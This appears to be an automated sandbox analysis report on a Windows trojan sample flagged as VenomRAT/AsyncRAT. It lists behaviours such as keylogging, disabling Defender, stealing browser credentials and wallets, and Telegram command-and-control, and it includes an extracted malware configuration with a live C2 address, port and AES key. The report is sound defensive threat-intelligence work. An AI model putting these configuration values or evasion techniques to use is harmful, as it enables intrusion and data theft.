Windows Analysis Report
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Analysis ID:	1446514
MD5:	144f1b1c4b9cdad97d8dd1a3a89e7ea1
SHA1:	1a11d76a6ab646a0d699efa0e5fc71de6e5af92c
SHA256:	e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944
Tags:	exeVenomRAT
Infos:

Detection

AsyncRAT, DcRat, StormKitty, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AsyncRAT

Yara detected BrowserPasswordDump

Yara detected DcRat

Yara detected StormKitty Stealer

Yara detected VenomRAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Binary or sample is protected by dotNetProtector

Check if machine is in data center or colocation facility

Contains functionality to log keystrokes (.Net Source)

Disable UAC(promptonsecuredesktop)

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables UAC (registry)

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Windows Service Tampering

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Uses whoami command line tool to query computer and username

Very long command line found

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Avira: detection malicious, Label: TR/Spy.Agent.qbvjl

Found malware configuration

Source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VenomRAT {"Server": "66.235.168.242", "Ports": "3232", "Version": "", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Loaader.exe", "AES_key": "tE8IGfk7UYxxW5jF9uxnGzkxU8UnVy3F", "Mutex": "iFe4z2UwXC6AffU6", "Certificate": "MIICKTCCAZKgAwIBAgIVAOwI49vECmkjcVi6vDRu+6lTwBelMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNjI0MTA1NzMxWhcNMzQwNDAyMTA1NzMwWjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwLjfJLJldOS/ukdvNaxCeCKlqSDodMxbIlUBJFj4ifPzaijU+Qc9+Jdvhi6ZCNs9E/uBCzQd+fJoEornr5T4fZqOQIS2naeK29VzB3/xJlBW3faQNOQXicF/HSbX0ljWeGIbgZr/lpicEtjGgA1RGEt0zY2hVTNIufmV3WTYnLkCAwEAAaMyMDAwHQYDVR0OBBYEFE37VDHHP+vN1IXecEP/zz0inroMMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAaFlOwVBtr2Q4kDD0D5vcnSs/NiWSEKiRtNBVph0GxdbQXeE7epqNbjAM8aVZRDFw4hMP1gxetRk+Olcgp6/RDLzmei9uIydxJ8dk+KsCu0zWoL9yNWBx2BwVBNa7k3gAvh+CNuHFwb04ZG8kLR93TyFRZDUHUWglVnA3DQwJqrw=", "ServerSignature": "iMAOwDJA0vMpVx4GkSywNj1D9PkiTGYL8k2vajxwK0ZTkgcoy6ziEU37PU07UskWTqs4CQy9wpx58wUw1AAp0a59QrAxozzZ/IsZBApD2Cr3P8v6ZVT8lHLZwC7Rvm+MFMotN8SBl4jk9ACD4dSwXvpgx0mYcM4Mkw7WfxAX6J8=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
Source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Ports": ["3232"], "Server": ["66.235.168.242"], "Certificate": "MIICKTCCAZKgAwIBAgIVAOwI49vECmkjcVi6vDRu+6lTwBelMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNjI0MTA1NzMxWhcNMzQwNDAyMTA1NzMwWjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwLjfJLJldOS/ukdvNaxCeCKlqSDodMxbIlUBJFj4ifPzaijU+Qc9+Jdvhi6ZCNs9E/uBCzQd+fJoEornr5T4fZqOQIS2naeK29VzB3/xJlBW3faQNOQXicF/HSbX0ljWeGIbgZr/lpicEtjGgA1RGEt0zY2hVTNIufmV3WTYnLkCAwEAAaMyMDAwHQYDVR0OBBYEFE37VDHHP+vN1IXecEP/zz0inroMMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAaFlOwVBtr2Q4kDD0D5vcnSs/NiWSEKiRtNBVph0GxdbQXeE7epqNbjAM8aVZRDFw4hMP1gxetRk+Olcgp6/RDLzmei9uIydxJ8dk+KsCu0zWoL9yNWBx2BwVBNa7k3gAvh+CNuHFwb04ZG8kLR93TyFRZDUHUWglVnA3DQwJqrw=", "Server Signature": "iMAOwDJA0vMpVx4GkSywNj1D9PkiTGYL8k2vajxwK0ZTkgcoy6ziEU37PU07UskWTqs4CQy9wpx58wUw1AAp0a59QrAxozzZ/IsZBApD2Cr3P8v6ZVT8lHLZwC7Rvm+MFMotN8SBl4jk9ACD4dSwXvpgx0mYcM4Mkw7WfxAX6J8="}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Client.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\Loaader.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\Loader.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	ReversingLabs: Detection: 73%
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Virustotal: Detection: 82%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF8491200F2 CryptUnprotectData,		20_2_00007FF8491200F2
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF84912DDB5 CryptUnprotectData,		20_2_00007FF84912DDB5

Uses 32bit PE files

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.5:61173 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61038 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61136 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61142 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61259 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61324 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %costura.messagepacklib.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.costura.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Keylogger.pdb source: Loader.exe, 00000014.00000002.2813392889.000000001CC40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: tion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb`- source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3812.tmp.dmp.30.dr
Source:	Binary string: WinDefend.pdb source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000000.2004261528.0000000000BEC000.00000002.00000001.01000000.00000008.sdmp, WinDefend.exe.0.dr
Source:	Binary string: lib.pdbX source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: SendMemory.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb^ source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Keylogger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000002F.00000002.3065403253.0000029A21DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Recovery.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Dynamic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: MessagePackLib.pdbzZ) source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: SendMemory.pdb g source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Logger.pdb source: Loader.exe, 00000014.00000002.2746255140.000000001B4A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mscorlib.pdb Operatin source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbP source: WER3812.tmp.dmp.30.dr
